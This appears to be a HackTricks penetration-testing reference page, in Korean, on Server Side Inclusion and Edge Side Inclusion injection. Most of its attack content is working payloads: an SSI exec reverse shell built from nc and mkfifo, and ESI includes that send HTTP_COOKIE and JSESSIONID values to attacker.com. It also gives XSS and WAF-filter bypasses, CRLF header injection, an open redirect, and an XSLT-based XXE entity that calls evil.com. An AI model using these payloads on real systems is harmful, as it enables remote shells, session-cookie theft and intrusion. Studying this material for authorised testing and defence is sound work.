Server Side Inclusion/Edge Side Inclusion Injection

Tip

AWS ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°:HackTricks Training AWS Red Team Expert (ARTE)
GCP ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training GCP Red Team Expert (GRTE) Azure ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks μ§€μ›ν•˜κΈ°

Server Side Inclusion Basic Information

(Introduction taken from Apache docs)

SSI (μ„œλ²„ μ‚¬μ΄λ“œ 포함)λŠ” HTML νŽ˜μ΄μ§€μ— 배치되고, νŽ˜μ΄μ§€κ°€ μ œκ³΅λ˜λŠ” λ™μ•ˆ μ„œλ²„μ—μ„œ ν‰κ°€λ˜λŠ” μ§€μ‹œμ–΄μž…λ‹ˆλ‹€. 이λ₯Ό 톡해 κΈ°μ‘΄ HTML νŽ˜μ΄μ§€μ— λ™μ μœΌλ‘œ μƒμ„±λœ μ½˜ν…μΈ λ₯Ό μΆ”κ°€ν•  수 있으며, 전체 νŽ˜μ΄μ§€λ₯Ό CGI ν”„λ‘œκ·Έλž¨μ΄λ‚˜ λ‹€λ₯Έ 동적 κΈ°μˆ μ„ 톡해 μ œκ³΅ν•  ν•„μš”κ°€ μ—†μŠ΅λ‹ˆλ‹€.
예λ₯Ό λ“€μ–΄, κΈ°μ‘΄ HTML νŽ˜μ΄μ§€μ— λ‹€μŒκ³Ό 같은 μ§€μ‹œμ–΄λ₯Ό λ°°μΉ˜ν•  수 μžˆμŠ΅λ‹ˆλ‹€:

<!--#echo var="DATE_LOCAL" -->

그리고 νŽ˜μ΄μ§€κ°€ 제곡될 λ•Œ, 이 쑰각은 ν‰κ°€λ˜μ–΄ κ·Έ κ°’μœΌλ‘œ λŒ€μ²΄λ©λ‹ˆλ‹€:

Tuesday, 15-Jan-2013 19:28:54 EST

SSIλ₯Ό μ‚¬μš©ν•  μ‹œμ κ³Ό νŽ˜μ΄μ§€λ₯Ό μ™„μ „νžˆ ν”„λ‘œκ·Έλž¨μ— μ˜ν•΄ 생성할 μ‹œμ μ˜ 결정은 일반적으둜 νŽ˜μ΄μ§€μ˜ 정적 λΆ€λΆ„κ³Ό νŽ˜μ΄μ§€κ°€ 제곡될 λ•Œλ§ˆλ‹€ μž¬κ³„μ‚°ν•΄μ•Ό ν•˜λŠ” λΆ€λΆ„μ˜ 양에 따라 λ‹¬λΌμ§‘λ‹ˆλ‹€. SSIλŠ” μœ„μ— ν‘œμ‹œλœ ν˜„μž¬ μ‹œκ°„κ³Ό 같은 μž‘μ€ 정보 쑰각을 μΆ”κ°€ν•˜λŠ” ν›Œλ₯­ν•œ λ°©λ²•μž…λ‹ˆλ‹€. κ·ΈλŸ¬λ‚˜ νŽ˜μ΄μ§€μ˜ λŒ€λΆ€λΆ„μ΄ 제곡될 λ•Œ μƒμ„±λœλ‹€λ©΄, λ‹€λ₯Έ 해결책을 μ°Ύμ•„μ•Ό ν•©λ‹ˆλ‹€.

μ›Ή μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ΄ .shtml, .shtm λ˜λŠ” .stm ν™•μž₯자λ₯Ό 가진 νŒŒμΌμ„ μ‚¬μš©ν•œλ‹€λ©΄ SSI의 쑴재λ₯Ό μΆ”λ‘ ν•  수 μžˆμ§€λ§Œ, κ·Έκ²ƒλ§Œμ΄ μ „λΆ€λŠ” μ•„λ‹™λ‹ˆλ‹€.

μ „ν˜•μ μΈ SSI ν‘œν˜„μ‹μ€ λ‹€μŒ ν˜•μ‹μ„ κ°€μ§‘λ‹ˆλ‹€:

<!--#directive param="value" -->

확인

// Document name
<!--#echo var="DOCUMENT_NAME" -->
// Date
<!--#echo var="DATE_LOCAL" -->

// File inclusion
<!--#include virtual="/index.html" -->
// Including files (same directory)
<!--#include file="file_to_include.html" -->
// CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->
// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->
// Modification date of a file
<!--#flastmod file="index.html" -->

// Command exec
<!--#exec cmd="dir" -->
// Command exec
<!--#exec cmd="ls" -->
// Reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

// Print all variables
<!--#printenv -->
// Setting variables
<!--#set var="name" value="Rich" -->

Edge Side Inclusion

정보λ₯Ό μΊμ‹±ν•˜κ±°λ‚˜ 동적 μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ˜ μΌλΆ€λ‘œμ„œ μ½˜ν…μΈ κ°€ λ‹€μŒ λ²ˆμ— μ½˜ν…μΈ λ₯Ό 검색할 λ•Œ λ‹€λ₯Ό 수 μžˆλ‹€λŠ” λ¬Έμ œκ°€ μžˆμŠ΅λ‹ˆλ‹€. 이것이 ESIκ°€ μ‚¬μš©λ˜λŠ” 이유둜, ESI νƒœκ·Έλ₯Ό μ‚¬μš©ν•˜μ—¬ μΊμ‹œ 버전을 μ „μ†‘ν•˜κΈ° 전에 생성해야 ν•˜λŠ” 동적 μ½˜ν…μΈ λ₯Ό λ‚˜νƒ€λƒ…λ‹ˆλ‹€.
λ§Œμ•½ κ³΅κ²©μžκ°€ μΊμ‹œ μ½˜ν…μΈ  내에 ESI νƒœκ·Έλ₯Ό μ£Όμž…ν•  수 μžˆλ‹€λ©΄, κ·ΈλŠ” λ¬Έμ„œκ°€ μ‚¬μš©μžμ—κ²Œ μ „μ†‘λ˜κΈ° 전에 μž„μ˜μ˜ μ½˜ν…μΈ λ₯Ό μ£Όμž…ν•  수 μžˆμŠ΅λ‹ˆλ‹€.

ESI Detection

μ„œλ²„μ˜ μ‘λ‹΅μ—μ„œ λ‹€μŒ ν—€λ”λŠ” μ„œλ²„κ°€ ESIλ₯Ό μ‚¬μš©ν•˜κ³  μžˆμŒμ„ μ˜λ―Έν•©λ‹ˆλ‹€:

Surrogate-Control: content="ESI/1.0"

이 헀더λ₯Ό 찾을 수 μ—†λ‹€λ©΄, μ„œλ²„λŠ” μ–΄μ¨Œλ“  ESIλ₯Ό μ‚¬μš©ν•˜κ³  μžˆμ„ 수 μžˆμŠ΅λ‹ˆλ‹€.
λΈ”λΌμΈλ“œ μ΅μŠ€ν”Œλ‘œμž‡ μ ‘κ·Ό 방식도 μ‚¬μš©ν•  수 μžˆμŠ΅λ‹ˆλ‹€. μš”μ²­μ΄ 곡격자의 μ„œλ²„μ— 도착해야 ν•©λ‹ˆλ‹€:

// Basic detection
hell<!--esi-->o
// If previous is reflected as "hello", it's vulnerable

// Blind detection
<esi:include src=http://attacker.com>

// XSS Exploitation Example
<esi:include src=http://attacker.com/XSSPAYLOAD.html>

// Cookie Stealer (bypass httpOnly flag)
<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>

// Introduce private local files (Not LFI per se)
<esi:include src="supersecret.txt">

// Valid for Akamai, sends debug information in the response
<esi:debug/>

ESI 취약점

GoSecureλŠ” λ‹€μ–‘ν•œ ESI 지원 μ†Œν”„νŠΈμ›¨μ–΄μ— λŒ€ν•΄ μ‹œλ„ν•  수 μžˆλŠ” κ°€λŠ₯ν•œ 곡격을 μ΄ν•΄ν•˜κΈ° μœ„ν•œ ν‘œλ₯Ό μž‘μ„±ν–ˆμŠ΅λ‹ˆλ‹€. μ΄λŠ” μ§€μ›λ˜λŠ” κΈ°λŠ₯에 따라 λ‹€λ¦…λ‹ˆλ‹€:

  • Includes: <esi:includes> μ§€μ‹œμ–΄λ₯Ό μ§€μ›ν•©λ‹ˆλ‹€.
  • Vars: <esi:vars> μ§€μ‹œμ–΄λ₯Ό μ§€μ›ν•©λ‹ˆλ‹€. XSS ν•„ν„°λ₯Ό μš°νšŒν•˜λŠ” 데 μœ μš©ν•©λ‹ˆλ‹€.
  • Cookie: λ¬Έμ„œ μΏ ν‚€λŠ” ESI 엔진에 μ ‘κ·Όν•  수 μžˆμŠ΅λ‹ˆλ‹€.
  • Upstream Headers Required: μƒμœ„ μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ΄ 헀더λ₯Ό μ œκ³΅ν•˜μ§€ μ•ŠμœΌλ©΄ λŒ€μ²΄ μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ€ ESI λ¬Έμž₯을 μ²˜λ¦¬ν•˜μ§€ μ•ŠμŠ΅λ‹ˆλ‹€.
  • Host Allowlist: 이 경우 ESI 포함은 ν—ˆμš©λœ μ„œλ²„ ν˜ΈμŠ€νŠΈμ—μ„œλ§Œ κ°€λŠ₯ν•˜λ―€λ‘œ, 예λ₯Ό λ“€μ–΄ SSRFλŠ” ν•΄λ‹Ή ν˜ΈμŠ€νŠΈμ— λŒ€ν•΄μ„œλ§Œ κ°€λŠ₯ν•©λ‹ˆλ‹€.
μ†Œν”„νŠΈμ›¨μ–΄IncludesVarsμΏ ν‚€μƒμœ„ 헀더 ν•„μš”ν˜ΈμŠ€νŠΈ ν™”μ΄νŠΈλ¦¬μŠ€νŠΈ
Squid3μ˜ˆμ˜ˆμ˜ˆμ˜ˆμ•„λ‹ˆμ˜€
Varnish Cacheμ˜ˆμ•„λ‹ˆμ˜€μ•„λ‹ˆμ˜€μ˜ˆμ˜ˆ
Fastlyμ˜ˆμ•„λ‹ˆμ˜€μ•„λ‹ˆμ˜€μ•„λ‹ˆμ˜€μ˜ˆ
Akamai ESI ν…ŒμŠ€νŠΈ μ„œλ²„ (ETS)μ˜ˆμ˜ˆμ˜ˆμ•„λ‹ˆμ˜€μ•„λ‹ˆμ˜€
NodeJS esiμ˜ˆμ˜ˆμ˜ˆμ•„λ‹ˆμ˜€μ•„λ‹ˆμ˜€
NodeJS nodesiμ˜ˆμ•„λ‹ˆμ˜€μ•„λ‹ˆμ˜€μ•„λ‹ˆμ˜€μ„ νƒμ 

XSS

λ‹€μŒ ESI μ§€μ‹œμ–΄λŠ” μ„œλ²„μ˜ 응닡 λ‚΄μ—μ„œ μž„μ˜μ˜ νŒŒμΌμ„ λ‘œλ“œν•©λ‹ˆλ‹€.

<esi:include src=http://attacker.com/xss.html>

ν΄λΌμ΄μ–ΈνŠΈ XSS 보호 우회

x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

Use <!--esi--> to bypass WAFs:
<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
<img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>

μΏ ν‚€ ν›”μΉ˜κΈ°

  • 원격 μΏ ν‚€ ν›”μΉ˜κΈ°
<esi:include src=http://attacker.com/$(HTTP_COOKIE)>
<esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />
  • XSSλ₯Ό μ‚¬μš©ν•˜μ—¬ 응닡에 λ°˜μ˜ν•˜μ—¬ HTTP_ONLY μΏ ν‚€λ₯Ό ν›”μΉ˜κΈ°:
# This will reflect the cookies in the response
<!--esi $(HTTP_COOKIE) -->
# Reflect XSS (you can put '"><svg/onload=prompt(1)>' URL encoded and the URL encode eveyrhitng to send it in the HTTP request)
<!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->

# It's possible to put more complex JS code to steal cookies or perform actions

Private Local File

이것을 β€œLocal File Inclusionβ€œκ³Ό ν˜Όλ™ν•˜μ§€ λ§ˆμ‹­μ‹œμ˜€:

<esi:include src="secret.txt">

CRLF

<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>

Open Redirect

λ‹€μŒμ€ 응닡에 Location 헀더λ₯Ό μΆ”κ°€ν•©λ‹ˆλ‹€.

<!--esi $add_header('Location','http://attacker.com') -->

헀더 μΆ”κ°€

  • κ°•μ œ μš”μ²­μ— 헀더 μΆ”κ°€
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345"/>
</esi:include>
  • 응닡에 헀더 μΆ”κ°€ (XSSκ°€ μžˆλŠ” μ‘λ‹΅μ—μ„œ β€œContent-Type: text/json” μš°νšŒμ— 유용)
<!--esi/$add_header('Content-Type','text/html')/-->

<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->

# Check the number of url_decode to know how many times you can URL encode the value

CRLF in Add header (CVE-2019-2438)

<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345
Host: anotherhost.com"/>
</esi:include>

Akamai debug

이것은 응닡에 ν¬ν•¨λœ 디버그 정보λ₯Ό μ „μ†‘ν•©λ‹ˆλ‹€:

<esi:debug/>

ESI + XSLT = XXE

eXtensible Stylesheet Language Transformations (XSLT) ꡬ문을 ESIμ—μ„œ μ‚¬μš©ν•  수 있으며, 단지 dca 값을 **xslt**둜 μ§€μ •ν•˜λ©΄ λ©λ‹ˆλ‹€. μ΄λŠ” XSLTλ₯Ό μ•…μš©ν•˜μ—¬ XML μ™ΈλΆ€ μ—”ν‹°ν‹° 취약점(XXE)을 μƒμ„±ν•˜κ³  μ•…μš©ν•  수 있게 ν•  수 μžˆμŠ΅λ‹ˆλ‹€:

<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />

XSLT 파일:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]>
<foo>&xxe;</foo>

XSLT νŽ˜μ΄μ§€λ₯Ό ν™•μΈν•˜μ„Έμš”:

XSLT Server Side Injection (Extensible Stylesheet Language Transformations)

μ°Έκ³  λ¬Έν—Œ

브루트 포슀 탐지 λͺ©λ‘

https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt

Tip

AWS ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°:HackTricks Training AWS Red Team Expert (ARTE)
GCP ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training GCP Red Team Expert (GRTE) Azure ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks μ§€μ›ν•˜κΈ°